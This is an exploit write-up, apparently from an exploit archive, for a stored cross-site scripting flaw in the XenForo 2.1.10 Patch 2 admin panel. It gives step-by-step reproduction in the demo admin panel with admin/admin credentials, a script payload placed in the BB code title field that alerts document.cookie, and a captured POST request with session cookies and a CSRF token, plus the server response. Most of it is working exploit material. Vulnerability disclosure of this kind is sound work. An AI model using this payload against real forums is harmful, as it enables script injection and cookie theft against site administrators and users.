# Exploit Title: XenForo v2.1.10 Patch 2 Stored XSS
# Date:16.08.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://xenforo.com/demo/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog :https://pentest-vincent.blogspot.com/
# PoC :https://pentest-vincent.blogspot.com/2020/08/xenforo-v2110-patch-2-stored-xss.html

PoC:

I use demo XenForo Admin panel for test.
Create demo site:
https://xenforo.com/demo/
Login:admin
Password:admin
Go to the Admin panel -> open Content-> bb codes->Add bb code

Put xss code in field "Title" or "Description" or other and save this.

Xss code:

"""><script>alert(document.cookie)</script><script>alert("Stored XSS
XenForo")</script>

We have a stored xss.

Picture:

https://imgur.com/a/sfE6DwZ

Video:

https://www.youtube.com/watch?v=eIJwP0Y1luQ&feature=youtu.be

https://27ff066882409b73.demo-xenforo.com/2110p2/admin.php?bb-codes/save
Host: 27ff066882409b73.demo-xenforo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://27ff066882409b73.demo-xenforo.com/2110p2/admin.php?bb-codes/add
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------3006497114009
Content-Length: 2530
Origin: https://27ff066882409b73.demo-xenforo.com
Connection: keep-alive
Cookie: 2110p2_csrf=R0-3YLvAUaqs1EVL;
2110p2_user=1%2CK6XXrhPx4KhqByRM3saOr3gOzYJ0_-8cA-qKDEcw;
2110p2_session=m0BX5XYtnGIc5HogKPEcY2jwdZrOd95u;
2110p2_session_admin=bru_eXQSO-jIXtAaESSJDoD69BLcIiVd
bb_code_id=test&title=""><script>alert("Stored XSS
XenForo")</script>&desc=&bb_code_mode=replace&has_option=no&replace_html=&callback_class=&callback_method=&editor_icon_type=&example=&output=&allow_signature=1&active=1&addon_id=&option_regex=&trim_lines_after=0&replace_html_email=&replace_text=&_xfToken=1597585880,aa740358187e6579a880755adc20d9ba,1597585880,aa740358187e6579a880755adc20d9ba&_xfRequestUri=/2110p2/admin.php?bb-codes/add&_xfWithData=1&_xfResponseType=json
POST: HTTP/1.1 200 OK

Date: Sun, 16 Aug 2020 13:51:29 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/7.2.12
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Last-Modified: Sun, 16 Aug 2020 13:51:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, max-age=0
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 254
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8